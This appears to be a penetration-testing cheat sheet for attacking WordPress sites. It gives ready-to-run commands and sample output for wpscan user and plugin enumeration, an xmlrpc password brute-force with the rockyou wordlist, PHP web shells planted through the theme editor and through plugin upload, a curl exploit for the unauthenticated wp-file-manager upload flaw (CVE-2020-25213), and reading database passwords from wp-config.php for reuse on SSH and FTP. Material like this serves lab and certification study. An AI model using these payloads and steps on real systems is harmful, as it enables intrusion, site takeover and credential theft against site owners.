WordPress

What it is: The most popular CMS on the internet, powering ~40% of all websites. Plugins and themes are the primary attack surface — the core is generally secure when updated.

Default ports: 80, 443

Vuln research:


Enumerate WordPress

Full enumeration — Users, plugins, themes, versions

wpscan --url http://$IP/ -e ap,at,u --api-token YOUR_TOKEN
Example Output
[+] WordPress version 5.7.2
[+] User(s) Identified:
 - admin
 - editor
[+] Plugins Found:
 - wp-file-manager 6.0 (vulnerable!)

Brute force WordPress login

Target /wp-login.php with found usernames — Use xmlrpc for speed

wpscan --url http://$IP/ -U admin -P /usr/share/wordlists/rockyou.txt --password-attack xmlrpc
Example Output
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / monkey123

RCE via Theme Editor

Edit a PHP theme file to inject a shell — Requires admin access

# Appearance → Theme Editor → 404.php
# Replace content with:
<?php system($_GET['cmd']); ?>
# Visit: http://$IP/wp-content/themes/twentytwentyone/404.php?cmd=id
Example Output
uid=33(www-data) gid=33(www-data)

RCE via Plugin Upload

Upload a malicious plugin ZIP — Requires admin access

# Create malicious plugin
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip plugin-shell.zip shell.php
# Plugins → Add New → Upload Plugin → Install → Activate
# Visit: http://$IP/wp-content/plugins/shell.php?cmd=id

WP File Manager RCE (CVE-2020-25213)

Unauthenticated file upload — wp-file-manager < 6.9

curl -F 'cmd=upload' -F 'target=l1_Lw' -F 'upload[]=@shell.php' http://$IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

Extract credentials from wp-config.php

Database creds stored in plaintext — Check for password reuse

cat /var/www/html/wp-config.php | grep -i "DB_"
Example Output
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_admin');
define('DB_PASSWORD', 'SuperSecretDBPass!');
define('DB_HOST', 'localhost');
Try this password on SSH, FTP, other services